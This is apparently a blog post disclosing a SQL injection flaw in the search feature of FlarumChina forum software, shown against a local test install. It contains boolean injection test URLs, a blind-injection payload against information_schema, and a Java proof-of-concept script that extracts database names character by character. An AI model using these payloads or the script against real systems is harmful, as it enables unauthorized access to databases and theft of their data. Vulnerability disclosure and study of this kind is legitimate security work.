First,We need to download our vulnerable program in GitHub

links:https://github.com/skywalker512/FlarumChina/

Vulnerable versions: <= FlarumChina-beta.7C

When the build is completed, the following image will be displayed

So,The SQL Injection Vulnerability in Search Engine

You just need to visit the following links to make your judgment:

(1).http://127.0.0.1/?q=1%' and 1=1 --+

(2).http://127.0.0.1/?q=1%' and 1=2 --+

So, by returning the different pages mentioned above, we can see that there is a SQL injection vulnerability in this place.

Of course, I also wrote a script in Java to get the database name.

Although not perfect.

Principle:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

This link is returned when the page is normal.

So use this link to judge in my Java program

Java Poc:

 import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection; public class work { public static void main(String[] args) throws IOException {
BufferedReader in = null;
URL url = null;
String str = null;
for(int j=0;j<6;j++) {
String bm=String.valueOf(j);
System.out.print(bm+":");
for (int i=1;i<25;i++) {
String cs=String.valueOf(i);
in = new BufferedReader(new FileReader("C:\\Users\\DELL\\Desktop\\superdic.txt"));
while((str = in.readLine()) != null) {
String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20"+bm+",1),"+cs+",1)='"+str+"'%20--+";
try {
url = new URL(urlPath);
} catch (MalformedURLException e) {
System.out.println("error:"+cs);
}
URLConnection conn = url.openConnection();
conn.setDoInput(true);
BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));
StringBuilder sb = new StringBuilder();
String line = null;
while((line = br.readLine()) != null) {
sb.append(line);
}
if(sb.indexOf("http://localhost/d/2") != -1) {
if("+".equals(str)) {
break;
}
System.out.print(str);
break;
}
}
if("+".equals(str)) {
break;
}
}
System.out.print("\n");
}
in.close();
} }

Because I don't know how many databases there are, I'm going to run six for loops for the time being.

So the fifth line returned by the script does not have any output.

You can also use sqlmap directly to obtain of data.

Database:

But most websites are delayed, so script testing is recommended.

FlarumChina SQL injection Vulnerability的更多相关文章

  1. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. ubuntu 禁用 guest 账户

    第一步: run the command(s) below:        (编辑如下文件) sudo vi /usr/share/lightdm/lightdm.conf.d/50-ubuntu.c ...

  2. python闭包的理解说明

    什么是闭包: 闭包(closure)是函数式编程的重要的语法结构.函数式编程是一种编程范式 (而面向过程编程和面向对象编程也都是编程范式).在面向过程编程中,我们见到过函数(function):在面向 ...

  3. [转]MySQL中函数CONCAT及GROUP_CONCAT

    一.CONCAT()函数 CONCAT()函数用于将多个字符串连接成一个字符串. 使用数据表Info作为示例,其中SELECT id,name FROM info LIMIT 1;的返回结果为 +-- ...

  4. urllib处理包的简单使用

    我们可以使用urllib.request.urlopen()这个接口函数就可以打开一个网站,读取打印信息 你可以现在终端使用python from urllib import request if _ ...

  5. ANN算法总结

    kd-tree kd-tree works poorly in high dimensions (k<30) 自己实验的时候差不多20到30左右吧,超过之后,就真的很慢了 faiss suppo ...

  6. LeetCode(5):最长回文子串

    Medium! 题目描述: 给定一个字符串 s,找到 s 中最长的回文子串.你可以假设 s 长度最长为1000. 示例: 输入: "babad" 输出: "bab&quo ...

  7. pytest十一:函数传参和 firture 传参数 request

    为了提高代码的复用性,我们在写用例的时候,会用到函数,然后不同的用例去调用这个函数.比如登录操作,大部分的用例都会先登录,那就需要把登录单独抽出来写个函数,其它用例全部的调用这个登录函数就行.但是登录 ...

  8. equals&&==的使用

    package stringyiwen; /* * ==:比较运算符,在基本数据类型比较的是值* ==:引用数据类型比较的是地址值 *//* * equals方法:[只]用于[引用数据数据类型],如果 ...

  9. php安全篇过滤用户输入的参数(转)

    规则 1:绝不要信任外部数据或输入 关于Web应用程序安全性,必须认识到的第一件事是不应该信任外部数据.外部数据(outside data) 包括不是由程序员在PHP代码中直接输入的任何数据.在采取措 ...

  10. html中hr的各种样式使用

    第一种: <hr style=" height:2px;border:none;border-top:2px dotted #185598;" /> height:2p ...